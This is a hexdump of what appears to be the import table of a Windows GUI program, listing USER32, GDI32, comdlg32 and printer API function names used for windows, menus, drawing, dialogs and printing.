0006eb40  74 44 6c 67 54 61 62 49  74 65 6d 00 5c 01 47 65  |tDlgTabItem.\.Ge|
0006eb50  74 57 69 6e 64 6f 77 52  65 63 74 00 5b 01 47 65  |tWindowRect.[.Ge|
0006eb60  74 57 69 6e 64 6f 77 50  6c 61 63 65 6d 65 6e 74  |tWindowPlacement|
0006eb70  00 00 8c 01 49 73 49 63  6f 6e 69 63 00 00 71 02  |....IsIconic..q.|
0006eb80  53 79 73 74 65 6d 50 61  72 61 6d 65 74 65 72 73  |SystemParameters|
0006eb90  49 6e 66 6f 41 00 79 01  49 6e 74 65 72 73 65 63  |InfoA.y.Intersec|
0006eba0  74 52 65 63 74 00 d2 01  4f 66 66 73 65 74 52 65  |tRect.⚠.OffsetRe|
0006ebb0  63 74 00 00 00 02 52 65  67 69 73 74 65 72 57 69  |ct....RegisterWi|
0006ebc0  6e 64 6f 77 4d 65 73 73  61 67 65 41 00 00 5b 02  |ndowMessageA..[.|
0006ebd0  53 65 74 57 69 6e 64 6f  77 50 6f 73 00 00 58 02  |SetWindowPos..X.|
0006ebe0  53 65 74 57 69 6e 64 6f  77 4c 6f 6e 67 41 00 00  |SetWindowLongA..|
0006ebf0  52 01 47 65 74 57 69 6e  64 6f 77 00 30 02 53 65  |R.GetWindow.0.Se|
0006ec00  74 46 6f 72 65 67 72 6f  75 6e 64 57 69 6e 64 6f  |tForegroundWindo|
0006ec10  77 00 08 01 47 65 74 46  6f 72 65 67 72 6f 75 6e  |w...GetForegroun|
0006ec20  64 57 69 6e 64 6f 77 00  19 01 47 65 74 4c 61 73  |dWindow...GetLas|
0006ec30  74 41 63 74 69 76 65 50  6f 70 75 70 00 00 2c 01  |tActivePopup..,.|
0006ec40  47 65 74 4d 65 73 73 61  67 65 50 6f 73 00 2d 01  |GetMessagePos.-.|
0006ec50  47 65 74 4d 65 73 73 61  67 65 54 69 6d 65 00 00  |GetMessageTime..|
0006ec60  05 02 52 65 6d 6f 76 65  50 72 6f 70 41 00 16 00  |..RemovePropA...|
0006ec70  43 61 6c 6c 57 69 6e 64  6f 77 50 72 6f 63 41 00  |CallWindowProcA.|
0006ec80  3a 01 47 65 74 50 72 6f  70 41 00 00 86 02 55 6e  |:.GetPropA....Un|
0006ec90  68 6f 6f 6b 57 69 6e 64  6f 77 73 48 6f 6f 6b 45  |hookWindowsHookE|
0006eca0  78 00 42 02 53 65 74 50  72 6f 70 41 00 00 eb 00  |x.B.SetPropA..⚠.|
0006ecb0  47 65 74 43 6c 61 73 73  4c 6f 6e 67 41 00 15 00  |GetClassLongA...|
0006ecc0  43 61 6c 6c 4e 65 78 74  48 6f 6f 6b 45 78 00 00  |CallNextHookEx..|
0006ecd0  62 02 53 65 74 57 69 6e  64 6f 77 73 48 6f 6f 6b  |b.SetWindowsHook|
0006ece0  45 78 41 00 59 00 43 72  65 61 74 65 57 69 6e 64  |ExA.Y.CreateWind|
0006ecf0  6f 77 45 78 41 00 84 00  44 65 66 57 69 6e 64 6f  |owExA...DefWindo|
0006ed00  77 50 72 6f 63 41 00 00  12 01 47 65 74 4b 65 79  |wProcA....GetKey|
0006ed10  53 74 61 74 65 00 01 01  47 65 74 44 6c 67 43 74  |State...GetDlgCt|
0006ed20  72 6c 49 44 00 00 5e 01  47 65 74 57 69 6e 64 6f  |rlID..^.GetWindo|
0006ed30  77 54 65 78 74 41 00 00  5f 01 47 65 74 57 69 6e  |wTextA.._.GetWin|
0006ed40  64 6f 77 54 65 78 74 4c  65 6e 67 74 68 41 00 00  |dowTextLengthA..|
0006ed50  5a 02 53 65 74 57 69 6e  64 6f 77 50 6c 61 63 65  |Z.SetWindowPlace|
0006ed60  6d 65 6e 74 00 00 7c 02  54 72 61 63 6b 50 6f 70  |ment..|.TrackPop|
0006ed70  75 70 4d 65 6e 75 00 00  23 01 47 65 74 4d 65 6e  |upMenu..#.GetMen|
0006ed80  75 49 74 65 6d 49 44 00  42 01 47 65 74 53 75 62  |uItemID.B.GetSub|
0006ed90  4d 65 6e 75 00 00 22 01  47 65 74 4d 65 6e 75 49  |Menu..".GetMenuI|
0006eda0  74 65 6d 43 6f 75 6e 74  00 00 1c 01 47 65 74 4d  |temCount....GetM|
0006edb0  65 6e 75 00 f2 01 52 65  67 69 73 74 65 72 43 6c  |enu.⚠.RegisterCl|
0006edc0  61 73 73 41 00 00 e7 00  47 65 74 43 6c 61 73 73  |assA..⚠.GetClass|
0006edd0  49 6e 66 6f 41 00 ac 02  77 73 70 72 69 6e 74 66  |InfoA.⚠.wsprintf|
0006ede0  41 00 a6 02 57 69 6e 48  65 6c 70 41 00 00 e4 00  |A.⚠.WinHelpA..⚠.|
0006edf0  47 65 74 43 61 70 74 75  72 65 00 00 85 01 49 73  |GetCapture....Is|
0006ee00  43 68 69 6c 64 00 be 01  4d 65 73 73 61 67 65 42  |Child.⚠.MessageB|
0006ee10  6f 78 41 00 4c 01 47 65  74 54 6f 70 57 69 6e 64  |oxA.L.GetTopWind|
0006ee20  6f 77 00 00 47 02 53 65  74 53 63 72 6f 6c 6c 50  |ow..G.SetScrollP|
0006ee30  6f 73 00 00 3f 01 47 65  74 53 63 72 6f 6c 6c 50  |os..?.GetScrollP|
0006ee40  6f 73 00 00 48 02 53 65  74 53 63 72 6f 6c 6c 52  |os..H.SetScrollR|
0006ee50  61 6e 67 65 00 00 40 01  47 65 74 53 63 72 6f 6c  |ange..@.GetScrol|
0006ee60  6c 52 61 6e 67 65 00 00  68 02 53 68 6f 77 53 63  |lRange..h.ShowSc|
0006ee70  72 6f 6c 6c 42 61 72 00  46 02 53 65 74 53 63 72  |rollBar.F.SetScr|
0006ee80  6f 6c 6c 49 6e 66 6f 00  3e 01 47 65 74 53 63 72  |ollInfo.>.GetScr|
0006ee90  6f 6c 6c 49 6e 66 6f 00  0d 02 53 63 72 6f 6c 6c  |ollInfo...Scroll|
0006eea0  57 69 6e 64 6f 77 00 00  92 01 49 73 57 69 6e 64  |Window....IsWind|
0006eeb0  6f 77 56 69 73 69 62 6c  65 00 b8 00 45 6e 64 44  |owVisible.⚠.EndD|
0006eec0  65 66 65 72 57 69 6e 64  6f 77 50 6f 73 00 44 00  |eferWindowPos.D.|
0006eed0  43 6f 70 79 52 65 63 74  00 00 0b 00 42 65 67 69  |CopyRect....Begi|
0006eee0  6e 44 65 66 65 72 57 69  6e 64 6f 77 50 6f 73 00  |nDeferWindowPos.|
0006eef0  86 00 44 65 66 65 72 57  69 6e 64 6f 77 50 6f 73  |..DeferWindowPos|
0006ef00  00 00 d1 00 45 71 75 61  6c 52 65 63 74 00 0a 02  |..⚠.EqualRect...|
0006ef10  53 63 72 65 65 6e 54 6f  43 6c 69 65 6e 74 00 00  |ScreenToClient..|
0006ef20  02 00 41 64 6a 75 73 74  57 69 6e 64 6f 77 52 65  |..AdjustWindowRe|
0006ef30  63 74 45 78 00 00 2f 02  53 65 74 46 6f 63 75 73  |ctEx../.SetFocus|
0006ef40  00 00 07 01 47 65 74 46  6f 63 75 73 00 00 95 00  |....GetFocus....|
0006ef50  44 69 73 70 61 74 63 68  4d 65 73 73 61 67 65 41  |DispatchMessageA|
0006ef60  00 00 dc 01 50 65 65 6b  4d 65 73 73 61 67 65 41  |..⚠.PeekMessageA|
0006ef70  00 00 43 01 47 65 74 53  79 73 43 6f 6c 6f 72 00  |..C.GetSysColor.|
0006ef80  b9 01 4d 61 70 57 69 6e  64 6f 77 50 6f 69 6e 74  |⚠.MapWindowPoint|
0006ef90  73 00 0f 02 53 65 6e 64  44 6c 67 49 74 65 6d 4d  |s...SendDlgItemM|
0006efa0  65 73 73 61 67 65 41 00  de 01 50 6f 73 74 4d 65  |essageA.⚠.PostMe|
0006efb0  73 73 61 67 65 41 00 00  9e 01 4c 6f 61 64 49 63  |ssageA....LoadIc|
0006efc0  6f 6e 41 00 33 00 43 68  65 63 6b 44 6c 67 42 75  |onA.3.CheckDlgBu|
0006efd0  74 74 6f 6e 00 00 36 00  43 68 65 63 6b 52 61 64  |tton..6.CheckRad|
0006efe0  69 6f 42 75 74 74 6f 6e  00 00 03 01 47 65 74 44  |ioButton....GetD|
0006eff0  6c 67 49 74 65 6d 49 6e  74 00 04 01 47 65 74 44  |lgItemInt...GetD|
0006f000  6c 67 49 74 65 6d 54 65  78 74 41 00 2b 02 53 65  |lgItemTextA.+.Se|
0006f010  74 44 6c 67 49 74 65 6d  49 6e 74 00 2c 02 53 65  |tDlgItemInt.,.Se|
0006f020  74 44 6c 67 49 74 65 6d  54 65 78 74 41 00 8a 01  |tDlgItemTextA...|
0006f030  49 73 44 6c 67 42 75 74  74 6f 6e 43 68 65 63 6b  |IsDlgButtonCheck|
0006f040  65 64 00 00 0e 02 53 63  72 6f 6c 6c 57 69 6e 64  |ed....ScrollWind|
0006f050  6f 77 45 78 00 00 88 01  49 73 44 69 61 6c 6f 67  |owEx....IsDialog|
0006f060  4d 65 73 73 61 67 65 41  00 00 5e 02 53 65 74 57  |MessageA..^.SetW|
0006f070  69 6e 64 6f 77 54 65 78  74 41 00 00 c9 01 4d 6f  |indowTextA..⚠.Mo|
0006f080  76 65 57 69 6e 64 6f 77  00 00 6a 02 53 68 6f 77  |veWindow..j.Show|
0006f090  57 69 6e 64 6f 77 00 00  b5 00 45 6e 61 62 6c 65  |Window..⚠.Enable|
0006f0a0  4d 65 6e 75 49 74 65 6d  00 00 34 00 43 68 65 63  |MenuItem..4.Chec|
0006f0b0  6b 4d 65 6e 75 49 74 65  6d 00 39 02 53 65 74 4d  |kMenuItem.9.SetM|
0006f0c0  65 6e 75 49 74 65 6d 42  69 74 6d 61 70 73 00 00  |enuItemBitmaps..|
0006f0d0  c4 01 4d 6f 64 69 66 79  4d 65 6e 75 41 00 27 01  |⚠.ModifyMenuA.'.|
0006f0e0  47 65 74 4d 65 6e 75 53  74 61 74 65 00 00 98 01  |GetMenuState....|
0006f0f0  4c 6f 61 64 42 69 74 6d  61 70 41 00 1e 01 47 65  |LoadBitmapA...Ge|
0006f100  74 4d 65 6e 75 43 68 65  63 6b 4d 61 72 6b 44 69  |tMenuCheckMarkDi|
0006f110  6d 65 6e 73 69 6f 6e 73  00 00 ae 02 77 76 73 70  |mensions..⚠.wvsp|
0006f120  72 69 6e 74 66 41 00 00  3a 00 43 6c 69 65 6e 74  |rintfA..:.Client|
0006f130  54 6f 53 63 72 65 65 6e  00 00 03 02 52 65 6c 65  |ToScreen....Rele|
0006f140  61 73 65 44 43 00 54 01  47 65 74 57 69 6e 64 6f  |aseDC.T.GetWindo|
0006f150  77 44 43 00 0c 00 42 65  67 69 6e 50 61 69 6e 74  |wDC...BeginPaint|
0006f160  00 00 bb 00 45 6e 64 50  61 69 6e 74 00 00 73 02  |..⚠.EndPaint..s.|
0006f170  54 61 62 62 65 64 54 65  78 74 4f 75 74 41 00 00  |TabbedTextOutA..|
0006f180  af 00 44 72 61 77 54 65  78 74 41 00 64 01 47 72  |⚠.DrawTextA.d.Gr|
0006f190  61 79 53 74 72 69 6e 67  41 00 9a 01 4c 6f 61 64  |ayStringA...Load|
0006f1a0  43 75 72 73 6f 72 41 00  1d 02 53 65 74 43 61 70  |CursorA...SetCap|
0006f1b0  74 75 72 65 00 00 02 02  52 65 6c 65 61 73 65 43  |ture....ReleaseC|
0006f1c0  61 70 74 75 72 65 00 00  a5 02 57 61 69 74 4d 65  |apture..⚠.WaitMe|
0006f1d0  73 73 61 67 65 00 26 02  53 65 74 43 75 72 73 6f  |ssage.&.SetCurso|
0006f1e0  72 00 ff 00 47 65 74 44  65 73 6b 74 6f 70 57 69  |r.⚠.GetDesktopWi|
0006f1f0  6e 64 6f 77 00 00 62 01  47 65 74 57 69 6e 64 6f  |ndow..b.GetWindo|
0006f200  77 54 68 72 65 61 64 50  72 6f 63 65 73 73 49 64  |wThreadProcessId|
0006f210  00 00 a9 02 57 69 6e 64  6f 77 46 72 6f 6d 50 6f  |..⚠.WindowFromPo|
0006f220  69 6e 74 00 82 02 54 72  61 6e 73 6c 61 74 65 4d  |int...TranslateM|
0006f230  65 73 73 61 67 65 00 00  2a 01 47 65 74 4d 65 73  |essage..*.GetMes|
0006f240  73 61 67 65 41 00 45 02  53 65 74 52 65 63 74 45  |sageA.E.SetRectE|
0006f250  6d 70 74 79 00 00 96 01  4c 6f 61 64 41 63 63 65  |mpty....LoadAcce|
0006f260  6c 65 72 61 74 6f 72 73  41 00 7f 02 54 72 61 6e  |leratorsA...Tran|
0006f270  73 6c 61 74 65 41 63 63  65 6c 65 72 61 74 6f 72  |slateAccelerator|
0006f280  41 00 8d 00 44 65 73 74  72 6f 79 4d 65 6e 75 00  |A...DestroyMenu.|
0006f290  a6 01 4c 6f 61 64 4d 65  6e 75 41 00 35 02 53 65  |⚠.LoadMenuA.5.Se|
0006f2a0  74 4d 65 6e 75 00 09 02  52 65 75 73 65 44 44 45  |tMenu...ReuseDDE|
0006f2b0  6c 50 61 72 61 6d 00 00  8a 02 55 6e 70 61 63 6b  |lParam....Unpack|
0006f2c0  44 44 45 6c 50 61 72 61  6d 00 0e 00 42 72 69 6e  |DDElParam...Brin|
0006f2d0  67 57 69 6e 64 6f 77 54  6f 54 6f 70 00 00 ea 01  |gWindowToTop..⚠.|
0006f2e0  50 74 49 6e 52 65 63 74  00 00 3e 02 53 65 74 50  |PtInRect..>.SetP|
0006f2f0  61 72 65 6e 74 00 8e 01  49 73 52 65 63 74 45 6d  |arent...IsRectEm|
0006f300  70 74 79 00 87 00 44 65  6c 65 74 65 4d 65 6e 75  |pty...DeleteMenu|
0006f310  00 00 45 01 47 65 74 53  79 73 74 65 6d 4d 65 6e  |..E.GetSystemMen|
0006f320  75 00 2b 00 43 68 61 72  54 6f 4f 65 6d 41 00 00  |u.+.CharToOemA..|
0006f330  ce 01 4f 65 6d 54 6f 43  68 61 72 41 00 00 e0 01  |⚠.OemToCharA..⚠.|
0006f340  50 6f 73 74 51 75 69 74  4d 65 73 73 61 67 65 00  |PostQuitMessage.|
0006f350  67 02 53 68 6f 77 4f 77  6e 65 64 50 6f 70 75 70  |g.ShowOwnedPopup|
0006f360  73 00 9a 02 56 61 6c 69  64 61 74 65 52 65 63 74  |s...ValidateRect|
0006f370  00 00 57 02 53 65 74 57  69 6e 64 6f 77 43 6f 6e  |..W.SetWindowCon|
0006f380  74 65 78 74 48 65 6c 70  49 64 00 00 b4 01 4d 61  |textHelpId..⚠.Ma|
0006f390  70 44 69 61 6c 6f 67 52  65 63 74 00 8b 00 44 65  |pDialogRect...De|
0006f3a0  73 74 72 6f 79 43 75 72  73 6f 72 00 44 02 53 65  |stroyCursor.D.Se|
0006f3b0  74 52 65 63 74 00 d4 00  46 69 6c 6c 52 65 63 74  |tRect.⚠.FillRect|
0006f3c0  00 00 d5 00 46 69 6e 64  57 69 6e 64 6f 77 41 00  |..⚠.FindWindowA.|
0006f3d0  ed 00 47 65 74 43 6c 61  73 73 4e 61 6d 65 41 00  |⚠.GetClassNameA.|
0006f3e0  00 01 47 65 74 44 69 61  6c 6f 67 42 61 73 65 55  |..GetDialogBaseU|
0006f3f0  6e 69 74 73 00 00 44 01  47 65 74 53 79 73 43 6f  |nits..D.GetSysCo|
0006f400  6c 6f 72 42 72 75 73 68  00 00 ab 01 4c 6f 61 64  |lorBrush..⚠.Load|
0006f410  53 74 72 69 6e 67 41 00  71 01 49 6e 66 6c 61 74  |StringA.q.Inflat|
0006f420  65 52 65 63 74 00 7c 01  49 6e 76 65 72 74 52 65  |eRect.|.InvertRe|
0006f430  63 74 00 00 fe 00 47 65  74 44 43 45 78 00 ae 01  |ct..⚠.GetDCEx.⚠.|
0006f440  4c 6f 63 6b 57 69 6e 64  6f 77 55 70 64 61 74 65  |LockWindowUpdate|
0006f450  00 00 74 01 49 6e 73 65  72 74 4d 65 6e 75 41 00  |..t.InsertMenuA.|
0006f460  28 01 47 65 74 4d 65 6e  75 53 74 72 69 6e 67 41  |(.GetMenuStringA|
0006f470  00 00 8c 00 44 65 73 74  72 6f 79 49 63 6f 6e 00  |....DestroyIcon.|
0006f480  25 00 43 68 61 72 4e 65  78 74 41 00 40 00 43 6f  |%.CharNextA.@.Co|
0006f490  70 79 41 63 63 65 6c 65  72 61 74 6f 72 54 61 62  |pyAcceleratorTab|
0006f4a0  6c 65 41 00 32 01 47 65  74 4e 65 78 74 44 6c 67  |leA.2.GetNextDlg|
0006f4b0  47 72 6f 75 70 49 74 65  6d 00 bd 01 4d 65 73 73  |GroupItem.⚠.Mess|
0006f4c0  61 67 65 42 65 65 70 00  2f 00 43 68 61 72 55 70  |ageBeep./.CharUp|
0006f4d0  70 65 72 41 00 00 47 01  47 65 74 54 61 62 62 65  |perA..G.GetTabbe|
0006f4e0  64 54 65 78 74 45 78 74  65 6e 74 41 00 00 f6 01  |dTextExtentA..⚠.|
0006f4f0  52 65 67 69 73 74 65 72  43 6c 69 70 62 6f 61 72  |RegisterClipboar|
0006f500  64 46 6f 72 6d 61 74 41  00 00 04 02 52 65 6d 6f  |dFormatA....Remo|
0006f510  76 65 4d 65 6e 75 00 00  e1 01 50 6f 73 74 54 68  |veMenu..⚠.PostTh|
0006f520  72 65 61 64 4d 65 73 73  61 67 65 41 00 00 55 53  |readMessageA..US|
0006f530  45 52 33 32 2e 64 6c 6c  00 00 44 00 43 72 65 61  |ER32.dll..D.Crea|
0006f540  74 65 50 65 6e 00 94 01  50 61 74 42 6c 74 00 00  |tePen...PatBlt..|
0006f550  58 00 45 6c 6c 69 70 73  65 00 4d 00 43 72 65 61  |X.Ellipse.M.Crea|
0006f560  74 65 53 6f 6c 69 64 42  72 75 73 68 00 00 82 01  |teSolidBrush....|
0006f570  4c 50 74 6f 44 50 00 00  4e 00 44 50 74 6f 4c 50  |LPtoDP..N.DPtoLP|
0006f580  00 00 21 01 47 65 74 44  43 4f 72 67 45 78 00 00  |..!.GetDCOrgEx..|
0006f590  1a 01 47 65 74 43 6c 69  70 42 6f 78 00 00 f3 01  |..GetClipBox..⚠.|
0006f5a0  53 65 74 54 65 78 74 43  6f 6c 6f 72 00 00 cd 01  |SetTextColor..⚠.|
0006f5b0  53 65 74 42 6b 43 6f 6c  6f 72 00 00 4f 01 47 65  |SetBkColor..O.Ge|
0006f5c0  74 4f 62 6a 65 63 74 41  00 00 24 00 43 72 65 61  |tObjectA..$.Crea|
0006f5d0  74 65 42 69 74 6d 61 70  00 00 50 00 44 65 6c 65  |teBitmap..P.Dele|
0006f5e0  74 65 44 43 00 00 fc 01  53 74 61 72 74 44 6f 63  |teDC..⚠.StartDoc|
0006f5f0  41 00 c0 01 53 61 76 65  44 43 00 00 b9 01 52 65  |A.⚠.SaveDC..⚠.Re|
0006f600  73 74 6f 72 65 44 43 00  c7 01 53 65 6c 65 63 74  |storeDC.⚠.Select|
0006f610  4f 62 6a 65 63 74 00 00  5f 01 47 65 74 53 74 6f  |Object.._.GetSto|
0006f620  63 6b 4f 62 6a 65 63 74  00 00 c8 01 53 65 6c 65  |ckObject..⚠.Sele|
0006f630  63 74 50 61 6c 65 74 74  65 00 ce 01 53 65 74 42  |ctPalette.⚠.SetB|
0006f640  6b 4d 6f 64 65 00 eb 01  53 65 74 50 6f 6c 79 46  |kMode.⚠.SetPolyF|
0006f650  69 6c 6c 4d 6f 64 65 00  ec 01 53 65 74 52 4f 50  |illMode.⚠.SetROP|
0006f660  32 00 ef 01 53 65 74 53  74 72 65 74 63 68 42 6c  |2.⚠.SetStretchBl|
0006f670  74 4d 6f 64 65 00 e2 01  53 65 74 4d 61 70 4d 6f  |tMode.⚠.SetMapMo|
0006f680  64 65 00 00 f6 01 53 65  74 56 69 65 77 70 6f 72  |de..⚠.SetViewpor|
0006f690  74 4f 72 67 45 78 00 00  8c 01 4f 66 66 73 65 74  |tOrgEx....Offset|
0006f6a0  56 69 65 77 70 6f 72 74  4f 72 67 45 78 00 f5 01  |ViewportOrgEx.⚠.|
0006f6b0  53 65 74 56 69 65 77 70  6f 72 74 45 78 74 45 78  |SetViewportExtEx|
0006f6c0  00 00 c1 01 53 63 61 6c  65 56 69 65 77 70 6f 72  |..⚠.ScaleViewpor|
0006f6d0  74 45 78 74 45 78 00 00  fa 01 53 65 74 57 69 6e  |tExtEx..⚠.SetWin|
0006f6e0  64 6f 77 4f 72 67 45 78  00 00 8d 01 4f 66 66 73  |dowOrgEx....Offs|
0006f6f0  65 74 57 69 6e 64 6f 77  4f 72 67 45 78 00 f9 01  |etWindowOrgEx.⚠.|
0006f700  53 65 74 57 69 6e 64 6f  77 45 78 74 45 78 00 00  |SetWindowExtEx..|
0006f710  c2 01 53 63 61 6c 65 57  69 6e 64 6f 77 45 78 74  |⚠.ScaleWindowExt|
0006f720  45 78 00 00 c5 01 53 65  6c 65 63 74 43 6c 69 70  |Ex..⚠.SelectClip|
0006f730  52 67 6e 00 98 00 45 78  63 6c 75 64 65 43 6c 69  |Rgn...ExcludeCli|
0006f740  70 52 65 63 74 00 80 01  49 6e 74 65 72 73 65 63  |pRect...Intersec|
0006f750  74 43 6c 69 70 52 65 63  74 00 8a 01 4f 66 66 73  |tClipRect...Offs|
0006f760  65 74 43 6c 69 70 52 67  6e 00 88 01 4d 6f 76 65  |etClipRgn...Move|
0006f770  54 6f 45 78 00 00 84 01  4c 69 6e 65 54 6f 00 00  |ToEx....LineTo..|
0006f780  f1 01 53 65 74 54 65 78  74 41 6c 69 67 6e 00 00  |⚠.SetTextAlign..|
0006f790  f4 01 53 65 74 54 65 78  74 4a 75 73 74 69 66 69  |⚠.SetTextJustifi|
0006f7a0  63 61 74 69 6f 6e 00 00  f2 01 53 65 74 54 65 78  |cation..⚠.SetTex|
0006f7b0  74 43 68 61 72 61 63 74  65 72 45 78 74 72 61 00  |tCharacterExtra.|
0006f7c0  e3 01 53 65 74 4d 61 70  70 65 72 46 6c 61 67 73  |⚠.SetMapperFlags|
0006f7d0  00 00 1f 01 47 65 74 43  75 72 72 65 6e 74 50 6f  |....GetCurrentPo|
0006f7e0  73 69 74 69 6f 6e 45 78  00 00 0b 00 41 72 63 54  |sitionEx....ArcT|
0006f7f0  6f 00 ca 01 53 65 74 41  72 63 44 69 72 65 63 74  |o.⚠.SetArcDirect|
0006f800  69 6f 6e 00 9e 01 50 6f  6c 79 44 72 61 77 00 00  |ion...PolyDraw..|
0006f810  a6 01 50 6f 6c 79 6c 69  6e 65 54 6f 00 00 d1 01  |⚠.PolylineTo..⚠.|
0006f820  53 65 74 43 6f 6c 6f 72  41 64 6a 75 73 74 6d 65  |SetColorAdjustme|
0006f830  6e 74 00 00 9d 01 50 6f  6c 79 42 65 7a 69 65 72  |nt....PolyBezier|
0006f840  54 6f 00 00 53 00 44 65  6c 65 74 65 4f 62 6a 65  |To..S.DeleteObje|
0006f850  63 74 00 00 1b 01 47 65  74 43 6c 69 70 52 67 6e  |ct....GetClipRgn|
0006f860  00 00 48 00 43 72 65 61  74 65 52 65 63 74 52 67  |..H.CreateRectRg|
0006f870  6e 00 c4 01 53 65 6c 65  63 74 43 6c 69 70 50 61  |n.⚠.SelectClipPa|
0006f880  74 68 00 00 9d 00 45 78  74 53 65 6c 65 63 74 43  |th....ExtSelectC|
0006f890  6c 69 70 52 67 6e 00 00  9a 01 50 6c 61 79 4d 65  |lipRgn....PlayMe|
0006f8a0  74 61 46 69 6c 65 52 65  63 6f 72 64 00 00 50 01  |taFileRecord..P.|
0006f8b0  47 65 74 4f 62 6a 65 63  74 54 79 70 65 00 92 00  |GetObjectType...|
0006f8c0  45 6e 75 6d 4d 65 74 61  46 69 6c 65 00 00 99 01  |EnumMetaFile....|
0006f8d0  50 6c 61 79 4d 65 74 61  46 69 6c 65 00 00 25 01  |PlayMetaFile..%.|
0006f8e0  47 65 74 44 65 76 69 63  65 43 61 70 73 00 78 01  |GetDeviceCaps.x.|
0006f8f0  47 65 74 56 69 65 77 70  6f 72 74 45 78 74 45 78  |GetViewportExtEx|
0006f900  00 00 7b 01 47 65 74 57  69 6e 64 6f 77 45 78 74  |..{.GetWindowExt|
0006f910  45 78 00 00 99 00 45 78  74 43 72 65 61 74 65 50  |Ex....ExtCreateP|
0006f920  65 6e 00 00 3d 00 43 72  65 61 74 65 48 61 74 63  |en..=.CreateHatc|
0006f930  68 42 72 75 73 68 00 00  43 00 43 72 65 61 74 65  |hBrush..C.Create|
0006f940  50 61 74 74 65 72 6e 42  72 75 73 68 00 00 2e 00  |PatternBrush....|
0006f950  43 72 65 61 74 65 44 49  42 50 61 74 74 65 72 6e  |CreateDIBPattern|
0006f960  42 72 75 73 68 50 74 00  aa 01 50 74 56 69 73 69  |BrushPt.⚠.PtVisi|
0006f970  62 6c 65 00 ae 01 52 65  63 74 56 69 73 69 62 6c  |ble.⚠.RectVisibl|
0006f980  65 00 05 02 54 65 78 74  4f 75 74 41 00 00 9e 00  |e...TextOutA....|
0006f990  45 78 74 54 65 78 74 4f  75 74 41 00 95 00 45 73  |ExtTextOutA...Es|
0006f9a0  63 61 70 65 00 00 01 02  53 74 72 65 74 63 68 44  |cape....StretchD|
0006f9b0  49 42 69 74 73 00 2a 00  43 72 65 61 74 65 43 6f  |IBits.*.CreateCo|
0006f9c0  6d 70 61 74 69 62 6c 65  44 43 00 00 29 00 43 72  |mpatibleDC..).Cr|
0006f9d0  65 61 74 65 43 6f 6d 70  61 74 69 62 6c 65 42 69  |eateCompatibleBi|
0006f9e0  74 6d 61 70 00 00 12 01  47 65 74 43 68 61 72 57  |tmap....GetCharW|
0006f9f0  69 64 74 68 41 00 36 00  43 72 65 61 74 65 46 6f  |idthA.6.CreateFo|
0006fa00  6e 74 41 00 af 01 52 65  63 74 61 6e 67 6c 65 00  |ntA.⚠.Rectangle.|
0006fa10  79 01 47 65 74 56 69 65  77 70 6f 72 74 4f 72 67  |y.GetViewportOrg|
0006fa20  45 78 00 00 00 00 41 62  6f 72 74 44 6f 63 00 00  |Ex....AbortDoc..|
0006fa30  5a 00 45 6e 64 44 6f 63  00 00 5c 00 45 6e 64 50  |Z.EndDoc..\.EndP|
0006fa40  61 67 65 00 ff 01 53 74  61 72 74 50 61 67 65 00  |age.⚠.StartPage.|
0006fa50  c9 01 53 65 74 41 62 6f  72 74 50 72 6f 63 00 00  |⚠.SetAbortProc..|
0006fa60  2b 00 43 72 65 61 74 65  44 43 41 00 6e 01 47 65  |+.CreateDCA.n.Ge|
0006fa70  74 54 65 78 74 45 78 74  65 6e 74 50 6f 69 6e 74  |tTextExtentPoint|
0006fa80  33 32 41 00 75 01 47 65  74 54 65 78 74 4d 65 74  |32A.u.GetTextMet|
0006fa90  72 69 63 73 41 00 37 00  43 72 65 61 74 65 46 6f  |ricsA.7.CreateFo|
0006faa0  6e 74 49 6e 64 69 72 65  63 74 41 00 11 00 42 69  |ntIndirectA...Bi|
0006fab0  74 42 6c 74 00 00 69 01  47 65 74 54 65 78 74 43  |tBlt..i.GetTextC|
0006fac0  6f 6c 6f 72 00 00 07 01  47 65 74 42 6b 43 6f 6c  |olor....GetBkCol|
0006fad0  6f 72 00 00 4d 01 47 65  74 4e 65 61 72 65 73 74  |or..M.GetNearest|
0006fae0  43 6f 6c 6f 72 00 60 01  47 65 74 53 74 72 65 74  |Color.`.GetStret|
0006faf0  63 68 42 6c 74 4d 6f 64  65 00 58 01 47 65 74 50  |chBltMode.X.GetP|
0006fb00  6f 6c 79 46 69 6c 6c 4d  6f 64 65 00 65 01 47 65  |olyFillMode.e.Ge|
0006fb10  74 54 65 78 74 41 6c 69  67 6e 00 00 08 01 47 65  |tTextAlign....Ge|
0006fb20  74 42 6b 4d 6f 64 65 00  59 01 47 65 74 52 4f 50  |tBkMode.Y.GetROP|
0006fb30  32 00 73 01 47 65 74 54  65 78 74 46 61 63 65 41  |2.s.GetTextFaceA|
0006fb40  00 00 7c 01 47 65 74 57  69 6e 64 6f 77 4f 72 67  |..|.GetWindowOrg|
0006fb50  45 78 00 00 47 01 47 65  74 4d 61 70 4d 6f 64 65  |Ex..G.GetMapMode|
0006fb60  00 00 ed 01 53 65 74 52  65 63 74 52 67 6e 00 00  |..⚠.SetRectRgn..|
0006fb70  1e 00 43 6f 6d 62 69 6e  65 52 67 6e 00 00 49 00  |..CombineRgn..I.|
0006fb80  43 72 65 61 74 65 52 65  63 74 52 67 6e 49 6e 64  |CreateRectRgnInd|
0006fb90  69 72 65 63 74 00 22 00  43 6f 70 79 4d 65 74 61  |irect.".CopyMeta|
0006fba0  46 69 6c 65 41 00 47 44  49 33 32 2e 64 6c 6c 00  |FileA.GDI32.dll.|
0006fbb0  0b 00 47 65 74 53 61 76  65 46 69 6c 65 4e 61 6d  |..GetSaveFileNam|
0006fbc0  65 41 00 00 09 00 47 65  74 4f 70 65 6e 46 69 6c  |eA....GetOpenFil|
0006fbd0  65 4e 61 6d 65 41 00 00  04 00 43 6f 6d 6d 44 6c  |eNameA....CommDl|
0006fbe0  67 45 78 74 65 6e 64 65  64 45 72 72 6f 72 00 00  |gExtendedError..|
0006fbf0  0e 00 50 61 67 65 53 65  74 75 70 44 6c 67 41 00  |..PageSetupDlgA.|
0006fc00  10 00 50 72 69 6e 74 44  6c 67 41 00 07 00 47 65  |..PrintDlgA...Ge|
0006fc10  74 46 69 6c 65 54 69 74  6c 65 41 00 63 6f 6d 64  |tFileTitleA.comd|
0006fc20  6c 67 33 32 2e 64 6c 6c  00 00 1c 00 43 6c 6f 73  |lg32.dll....Clos|
0006fc30  65 50 72 69 6e 74 65 72  00 00 47 00 44 6f 63 75  |ePrinter..G.Docu|
0006fc40  6d 65 6e 74 50 72 6f 70  65 72 74 69 65 73 41 00  |mentPropertiesA.|
0006fc50  7c 00 4f 70 65 6e 50 72  69 6e 74 65 72 41 00 00  ||.OpenPrinterA..|
